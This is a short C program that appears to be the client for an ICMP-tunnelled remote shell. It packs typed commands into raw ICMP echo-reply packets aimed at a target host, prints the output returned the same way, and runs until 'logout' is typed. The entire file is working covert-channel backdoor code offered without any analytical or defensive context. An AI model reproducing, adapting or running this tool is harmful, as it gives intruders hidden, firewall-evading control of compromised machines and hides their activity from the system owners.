#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
/* #include <linux/net.h> */
#include <netdb.h>
#include <netinet/ip_icmp.h>

unsigned short cksum(void *ip,int len); 

void main(int argc,char **argv){
	int sock,adlen,i;
	struct {
		struct icmphdr icmp;
		char buf[56];
	} msg;
	unsigned long inaddr;
	struct sockaddr_in addr;
	char buffer[1024];
	long optval=49152;
	struct hostent *byname;
	fd_set	fdset;

	msg.icmp.type=ICMP_ECHOREPLY;
	msg.icmp.code=0;
	msg.icmp.un.echo.id=0;
	msg.icmp.un.echo.sequence=0;

	if ( argc != 2) {
		printf("%s what?\n",argv[0]);
		exit(1);
	}
	if ((inaddr = inet_addr(argv[1])) != INADDR_NONE ) 
		memcpy(&addr.sin_addr,&inaddr,sizeof(inaddr));
	else if ((byname=gethostbyname(argv[1])) == NULL) {
		printf("%s who?\n",argv[0]);
		exit(1);		
        	}
		else memcpy(&addr.sin_addr,byname->h_addr,byname->h_length);
	addr.sin_family=AF_INET;
	addr.sin_port=htons(0);
	memset(&addr.sin_zero,'\0',8);
	printf("pinshing %s\n",inet_ntoa((struct in_addr)addr.sin_addr));
	if ( (sock=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP)) <0) {
		printf("%s can't\n",argv[0]);
		exit(1);
	}
	do {
		FD_ZERO(&fdset);
		FD_SET(STDIN_FILENO,&fdset);
		FD_SET(sock,&fdset);
		FD_SET(STDIN_FILENO,&fdset);
		select(((STDIN_FILENO<sock)?sock:STDIN_FILENO)+1,&fdset,NULL,NULL,NULL);
		if(FD_ISSET(STDIN_FILENO,&fdset))  {
			msg.buf[read(STDIN_FILENO,msg.buf,55)]=0;
			msg.icmp.checksum=0;
			msg.icmp.checksum=cksum(&msg,sizeof(msg));
			sendto(sock,(void *)&msg,sizeof(msg),0,(struct sockaddr *)&addr,sizeof(addr));
		}
		if (FD_ISSET(sock,&fdset))	{
			adlen=sizeof(addr);
			optval=recvfrom(sock,(void *)buffer,sizeof(buffer),0,(struct sockaddr *)&addr,&adlen);
			adlen=(buffer[0]&0xf)*4;		
			if (*(int *)(buffer+adlen+4)==1) {
				printf("%s",buffer+adlen+8);
				fflush(stdout);
			}	
		}
	} while (strncmp("logout\n",msg.buf,7));
	close(sock);
}

unsigned short cksum(void *ip,int len) {
	long	sum=0;

	while (len>1) {
		sum += *((unsigned short *)ip)++;
		if (sum & 0x80000000)
			sum = (sum & 0xFFFF) + (sum >> 16);
		len -= 2;
	}
	if (len)
		sum +=(unsigned short) *(unsigned char *) ip;
	while (sum >>16)
		sum = (sum&0xFFFF) + (sum >> 16);
	return ~sum;
}

